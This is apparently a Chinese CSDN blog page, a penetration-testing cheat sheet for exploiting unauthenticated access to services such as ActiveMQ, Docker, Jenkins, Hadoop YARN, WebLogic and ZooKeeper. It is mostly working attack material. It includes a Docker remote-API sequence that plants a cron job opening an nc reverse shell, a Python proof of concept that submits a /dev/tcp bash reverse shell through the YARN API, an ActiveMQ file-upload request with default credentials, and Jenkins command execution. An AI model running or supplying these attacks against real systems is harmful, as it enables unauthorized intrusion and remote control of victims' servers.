WEB渗透-未授权访问篇

WEB渗透未授权访问篇-Redis-CSDN博客

activemq

默认端口8161,默认账户密码admin/admin http://1.1.1.1:8161/admin/connections.jsp

PUT /fileserver/%2F%2F2%083.jsp HTTP/1.0
Content-Length: 27
Host: 1.1.1.1:8161
Connection: Close
Authorization: Basic YWRtaW46YWRtaW4=
123123123123123123123123123

CouchDB

开源数据库,默认端口5984,SSL端口6984

curl 192.168.1.10:5984
curl 192.168.1.10:5984/_config

Docker

默认端口237

docker -H tcp://1.1.1.1:2375 images

本地监听 启动容器

docker -H tcp://1.1.1.1:2375 run -id -v /etc/crontabs:/tmp alpine:latest
docker -H tcp://1.1.1.1:2375 ps

进入容器

docker -H tcp://1.1.1.1:2375 exec -it a8ff7ed880fb sh

echo '* * * * * /usr/bin/nc {vps_ip} 9999 -e /bin/sh' >> /tmp/root #添加计划任务
cat /tmp/root 
exit

Shipyard默认密码 admin/shipyard

Elastic

默认端口9200

http://1.1.1.1:9200/_plugin/head/
http://1.1.1.1:9200/_nodes
http://1.1.1.1:9200/_river
http://1.1.1.1:9200/_plugin/sql/

jboss

http://192.168.1.1:8080/jmx-console/ 无需认证进入
jboss.deployment部署shell
addURL()的paramValue写入远程war木马地址

Jenkins

http://<target>:8080/manage
http://<target>:8080/script

执行系统命令

println "whoami".execute().text

hadoop

http://192.168.1.1:8088/cluster
本地监听端口 >> 创建Application >> 调用Submit Application API提交

poc

#!/usr/bin/env python
import requests

target = 'http://192.168.18.129:8088/'
lhost = '192.168.18.138' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

memcache

默认端口11211
>telnet 1.1.1.1 11211
>nc -vv 1.1.1.1 11211

mongo

默认端口27017直接连接进行增删改查
连接工具
https://s3.mongobooster.com/download/releasesv5/nosqlbooster4mongo-5.1.12.exe

VNC

默认端口 5900、5901

Solr

solr的管理界面通常包含如下信息:solr的配置信息(包括路径,用户名,系统版本信息),数据库的配置信息(地址,用户名,密码),数据库搜索数据等

http://xx/solr/admin
https://xx/solr/admin

Weblogic

J2EE应用服务器,默认端口7001 访问URL,直接打开后台页面

http://192.168.1.10:7001/console/css/%252e%252e%252fconsole.portal

Zabbix

服务器监控软件,默认端口10051
无需账户密码直接访问zabbix页面

zookeeper

默认端口2181 获得服务器环境信息

>echo envi|nc 192.168.0.1 2181
连接
>./zkCli.sh -server ip:port
连接工具
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip
相关推荐
开心工作室_kaic14 分钟前
ssm161基于web的资源共享平台的共享与开发+jsp(论文+源码)_kaic
java·开发语言·前端
刚刚好ā14 分钟前
js作用域超全介绍--全局作用域、局部作用、块级作用域
前端·javascript·vue.js·vue
黑客Ash1 小时前
【D01】网络安全概论
网络·安全·web安全·php
沉默璇年2 小时前
react中useMemo的使用场景
前端·react.js·前端框架
yqcoder2 小时前
reactflow 中 useNodesState 模块作用
开发语言·前端·javascript
2401_882727572 小时前
BY组态-低代码web可视化组件
前端·后端·物联网·低代码·数学建模·前端框架
SoaringHeart2 小时前
Flutter进阶:基于 MLKit 的 OCR 文字识别
前端·flutter
会发光的猪。2 小时前
css使用弹性盒,让每个子元素平均等分父元素的4/1大小
前端·javascript·vue.js
.Ayang3 小时前
SSRF漏洞利用
网络·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
.Ayang3 小时前
SSRF 漏洞全解析(概述、攻击流程、危害、挖掘与相关函数)
安全·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析·安全架构